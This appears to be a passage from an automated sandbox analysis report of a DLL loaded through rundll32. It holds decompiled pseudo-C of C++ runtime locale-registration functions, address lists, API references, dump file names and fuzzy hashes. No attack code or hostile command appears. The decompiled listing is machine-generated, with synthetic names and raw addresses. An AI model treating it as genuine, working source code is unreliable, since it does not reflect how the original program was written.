							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e26c414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E21D028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E220075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E206FD3(__eflags, _t61);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e2c6e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}









                          0x6e21bbd6
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc07
                          0x6e21bc0c
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21BBDD
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21BBE7
                          • int.LIBCPMT ref: 6E21BBFE
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21BC38
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BC58
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BC76
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: $n,n
                          • API String ID: 651022567-3748013742
                          • Opcode ID: f2667d9cebe87ca965cd52e37b60528922298404a2dc1f437f81022640f2288e
                          • Instruction ID: a6547bb170d677b3cbd03c7a0d613a1b2f3d707285ca525e638e82ef695a7e22
                          • Opcode Fuzzy Hash: f2667d9cebe87ca965cd52e37b60528922298404a2dc1f437f81022640f2288e
                          • Instruction Fuzzy Hash: E2110E79A0052ECFCB00DBE4C898AEDB7BBAF84B04F140909E110AB390DFB49A40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t330 - 0x14, 0);
				_t315 =  *0x6e2c6db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1E161C(0x6e2c6d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E2066BA(_t330 - 0x14);
					return E6E220075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E2113A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t330 - 0x20);
							E6E223D74(_t330 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t307, _t315, 0x14);
							E6E206653(_t330 - 0x14, 0);
							_t316 =  *0x6e2c6ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1E161C(0x6e2c6d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E2066BA(_t330 - 0x14);
								return E6E220075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E211409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t330 - 0x20);
										E6E223D74(_t330 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t234, _t308, _t316, 0x14);
										E6E206653(_t330 - 0x14, 0);
										_t317 =  *0x6e2c6de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1E161C(0x6e2c6d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E2066BA(_t330 - 0x14);
											return E6E220075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E211471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t330 - 0x20);
													E6E223D74(_t330 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t234, _t309, _t317, 0x14);
													E6E206653(_t330 - 0x14, 0);
													_t318 =  *0x6e2c6dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1E161C(0x6e2c6da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E2066BA(_t330 - 0x14);
														return E6E220075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E2114EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t330 - 0x20);
																E6E223D74(_t330 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t234, _t310, _t318, 0x14);
																E6E206653(_t330 - 0x14, 0);
																_t319 =  *0x6e2c6dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1E161C(0x6e2c6d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E2066BA(_t330 - 0x14);
																	return E6E220075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E211558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t330 - 0x20);
																			E6E223D74(_t330 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t234, _t311, _t319, 0x14);
																			E6E206653(_t330 - 0x14, 0);
																			_t320 =  *0x6e2c6e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1E161C(0x6e2c6dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E2066BA(_t330 - 0x14);
																				return E6E220075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E2115C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t330 - 0x20);
																						E6E223D74(_t330 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t234, _t312, _t320, 0x14);
																						E6E206653(_t330 - 0x14, 0);
																						_t321 =  *0x6e2c6dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1E161C(0x6e2c6d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E2066BA(_t330 - 0x14);
																							return E6E220075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E21162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1E1438(_t283);
																									E6E223D74(_t330 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e26851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e26c0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E21542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E220075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E206FD3(__eflags, _t313);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e2c6dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E206FD3(__eflags, _t312);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e2c6e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E206FD3(__eflags, _t311);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e2c6dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E206FD3(__eflags, _t310);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e2c6dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E206FD3(__eflags, _t309);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e2c6de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E206FD3(__eflags, _t308);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e2c6ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E206FD3(__eflags, _t307);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e2c6db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}



























                          0x6e20f8a5
                          0x6e20f8a5
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8d6
                          0x6e20f8db
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F8AC
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F8B6
                          • int.LIBCPMT ref: 6E20F8CD
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F907
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F927
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F945
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: dm,n
                          • API String ID: 651022567-1177862346
                          • Opcode ID: c62049bfba2d9931af0c89e5a49a84c2050b416cba52b783378c154e42e0e512
                          • Instruction ID: 7963a4779e0788762ceaea4ba09daf98973acaec55f14d88ed6e43071da81ed1
                          • Opcode Fuzzy Hash: c62049bfba2d9931af0c89e5a49a84c2050b416cba52b783378c154e42e0e512
                          • Instruction Fuzzy Hash: 2611E37590051E9BCF00DBE4C894AFEB7BBBF84718F240908E410AB2D0DBB49A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;

				_t551 = __edx;
				_t420 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t594 - 0x14, 0);
				_t567 =  *0x6e2c6dc0; // 0x0
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6E1E161C(0x6e2c6d74);
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6E2066BA(_t594 - 0x14);
					return E6E220075(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6E2110BF(__ebx, _t423, __edx, _t553, _t567) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t594 - 0x20);
							E6E223D74(_t594 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t553, _t567, 0x14);
							E6E206653(_t594 - 0x14, 0);
							_t568 =  *0x6e2c6df8; // 0x0
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6E1E161C(0x6e2c6da4);
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6E2066BA(_t594 - 0x14);
								return E6E220075(_t554);
							} else {
								__eflags = _t568;
								if(_t568 == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6E211127(_t420, _t430, __edx, _t554, _t568) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t594 - 0x20);
										E6E223D74(_t594 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t420, _t554, _t568, 0x14);
										E6E206653(_t594 - 0x14, 0);
										_t569 =  *0x6e2c6df4; // 0x0
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6E1E161C(0x6e2c6da0);
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6E2066BA(_t594 - 0x14);
											return E6E220075(_t555);
										} else {
											__eflags = _t569;
											if(_t569 == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6E2111AB(_t420, _t437, __edx, _t555, _t569) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t594 - 0x20);
													E6E223D74(_t594 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t420, _t555, _t569, 0x14);
													E6E206653(_t594 - 0x14, 0);
													_t570 =  *0x6e2c6dc8; // 0x0
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6E1E161C(0x6e2c6d7c);
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6E2066BA(_t594 - 0x14);
														return E6E220075(_t556);
													} else {
														__eflags = _t570;
														if(_t570 == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6E211230(_t420, _t444, _t551, _t556, _t570) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t594 - 0x20);
																E6E223D74(_t594 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t420, _t556, _t570, 0x14);
																E6E206653(_t594 - 0x14, 0);
																_t571 =  *0x6e2c6dc4; // 0x0
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6E1E161C(0x6e2c6d78);
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6E2066BA(_t594 - 0x14);
																	return E6E220075(_t557);
																} else {
																	__eflags = _t571;
																	if(_t571 == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6E2112B4(_t420, _t451, _t551, _t557, _t571) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t594 - 0x20);
																			E6E223D74(_t594 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t420, _t557, _t571, 0x14);
																			E6E206653(_t594 - 0x14, 0);
																			_t572 =  *0x6e2c6dd8; // 0x0
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6E1E161C(0x6e2c6d84);
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6E2066BA(_t594 - 0x14);
																				return E6E220075(_t558);
																			} else {
																				__eflags = _t572;
																				if(_t572 == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6E211339(_t420, _t458, _t551, _t558, _t572) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t594 - 0x20);
																						E6E223D74(_t594 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t420, _t558, _t572, 0x14);
